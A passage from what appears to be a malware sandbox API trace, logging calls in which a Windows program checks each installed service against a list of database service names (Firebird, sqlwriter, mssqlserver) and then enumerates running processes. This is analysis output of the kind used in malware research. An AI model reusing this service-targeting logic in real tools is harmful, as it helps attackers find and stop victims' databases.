returned 1 [0223.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0223.395] lstrlenW (lpString="BITS") returned 4 [0223.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0223.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0223.395] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0223.396] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0223.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0223.396] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0223.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0223.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0223.396] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0223.396] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0223.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0223.396] lstrlenW (lpString="CDPSvc") returned 6 [0223.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0223.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0223.396] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0223.396] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0223.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0223.396] lstrlenW (lpString="ClickToRunSvc") returned 13 [0223.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0223.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0223.396] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0223.396] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0223.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0223.396] lstrlenW (lpString="ClipSVC") returned 7 [0223.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0223.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0223.396] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0223.396] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0223.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0223.396] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0223.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0223.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0223.396] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0223.396] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0223.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0223.396] lstrlenW (lpString="CryptSvc") returned 8 [0223.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0223.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0223.396] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0223.396] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0223.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0223.397] lstrlenW (lpString="DcomLaunch") returned 10 [0223.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0223.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0223.397] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0223.397] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0223.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0223.397] lstrlenW (lpString="DeviceAssociationService") returned 24 [0223.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0223.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0223.397] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0223.397] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0223.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0223.397] lstrlenW (lpString="Dhcp") returned 4 [0223.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0223.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0223.397] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0223.397] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0223.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0223.397] lstrlenW (lpString="Dnscache") returned 8 [0223.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0223.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0223.397] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0223.397] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0223.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0223.397] lstrlenW (lpString="DoSvc") returned 5 [0223.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0223.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0223.397] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0223.397] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0223.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0223.397] lstrlenW (lpString="DPS") returned 3 [0223.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0223.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0223.397] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0223.397] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0223.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0223.398] lstrlenW (lpString="DusmSvc") returned 7 [0223.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0223.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0223.398] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0223.398] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0223.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0223.398] lstrlenW (lpString="EventLog") returned 8 [0223.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0223.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0223.398] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0223.398] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0223.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0223.398] lstrlenW (lpString="EventSystem") returned 11 [0223.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0223.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0223.398] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0223.398] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0223.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0223.398] lstrlenW (lpString="FontCache") returned 9 [0223.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0223.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0223.398] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0223.398] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0223.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0223.398] lstrlenW (lpString="gpsvc") returned 5 [0223.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0223.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0223.398] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0223.398] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0223.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0223.398] lstrlenW (lpString="iphlpsvc") returned 8 [0223.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0223.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0223.398] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0223.398] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0223.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0223.398] lstrlenW (lpString="KeyIso") returned 6 [0223.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0223.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0223.399] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0223.399] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0223.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0223.399] lstrlenW (lpString="LanmanServer") returned 12 [0223.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0223.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0223.399] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0223.399] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0223.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0223.399] lstrlenW (lpString="LanmanWorkstation") returned 17 [0223.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0223.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0223.399] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0223.399] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0223.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0223.399] lstrlenW (lpString="lfsvc") returned 5 [0223.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0223.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0223.399] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0223.399] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0223.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0223.399] lstrlenW (lpString="LicenseManager") returned 14 [0223.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0223.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0223.399] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0223.399] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0223.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0223.399] lstrlenW (lpString="lmhosts") returned 7 [0223.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0223.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0223.399] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0223.399] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0223.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0223.399] lstrlenW (lpString="LSM") returned 3 [0223.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0223.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0223.400] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0223.400] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0223.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0223.400] lstrlenW (lpString="MpsSvc") returned 6 [0223.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0223.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0223.400] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0223.400] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0223.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0223.400] lstrlenW (lpString="NcbService") returned 10 [0223.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0223.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0223.400] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0223.400] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0223.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0223.400] lstrlenW (lpString="netprofm") returned 8 [0223.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0223.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0223.400] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0223.400] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0223.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0223.400] lstrlenW (lpString="NlaSvc") returned 6 [0223.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0223.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0223.400] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0223.400] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0223.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0223.400] lstrlenW (lpString="nsi") returned 3 [0223.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0223.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0223.400] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0223.400] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0223.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0223.400] lstrlenW (lpString="PcaSvc") returned 6 [0223.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0223.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0223.400] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0223.401] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0223.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0223.401] lstrlenW (lpString="PlugPlay") returned 8 [0223.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0223.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0223.401] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0223.401] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0223.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0223.401] lstrlenW (lpString="Power") returned 5 [0223.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0223.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0223.401] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0223.401] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0223.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0223.401] lstrlenW (lpString="ProfSvc") returned 7 [0223.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0223.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0223.401] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0223.401] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0223.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0223.401] lstrlenW (lpString="RpcEptMapper") returned 12 [0223.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0223.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0223.401] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0223.401] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0223.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0223.401] lstrlenW (lpString="RpcSs") returned 5 [0223.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0223.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0223.401] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0223.401] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0223.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0223.401] lstrlenW (lpString="SamSs") returned 5 [0223.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0223.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0223.401] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0223.401] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0223.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0223.402] lstrlenW (lpString="Schedule") returned 8 [0223.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0223.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0223.402] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0223.402] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0223.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0223.402] lstrlenW (lpString="SecurityHealthService") returned 21 [0223.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0223.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0223.402] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0223.402] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0223.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0223.402] lstrlenW (lpString="SENS") returned 4 [0223.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0223.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0223.402] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0223.402] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0223.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0223.402] lstrlenW (lpString="ShellHWDetection") returned 16 [0223.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0223.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0223.402] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0223.402] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0223.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0223.402] lstrlenW (lpString="Spooler") returned 7 [0223.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0223.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0223.402] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0223.402] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0223.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0223.402] lstrlenW (lpString="sppsvc") returned 6 [0223.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0223.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0223.402] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0223.402] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0223.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0223.402] lstrlenW (lpString="SSDPSRV") returned 7 [0223.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0223.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0223.403] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0223.403] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0223.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x45c [0223.407] Process32FirstW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.407] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.409] lstrlenW (lpString="System") returned 6 [0223.409] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.410] lstrlenW (lpString="smss.exe") returned 8 [0223.410] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.410] lstrlenW (lpString="csrss.exe") returned 9 [0223.411] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.411] lstrlenW (lpString="wininit.exe") returned 11 [0223.411] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.412] lstrlenW (lpString="csrss.exe") returned 9 [0223.412] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.413] lstrlenW (lpString="winlogon.exe") returned 12 [0223.413] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.413] lstrlenW (lpString="services.exe") returned 12 [0223.413] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.414] lstrlenW (lpString="lsass.exe") returned 9 [0223.414] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.415] lstrlenW (lpString="svchost.exe") returned 11 [0223.415] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0223.416] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0223.416] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0223.416] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0223.416] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.417] lstrlenW (lpString="svchost.exe") returned 11 [0223.417] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.418] lstrlenW (lpString="dwm.exe") returned 7 [0223.418] 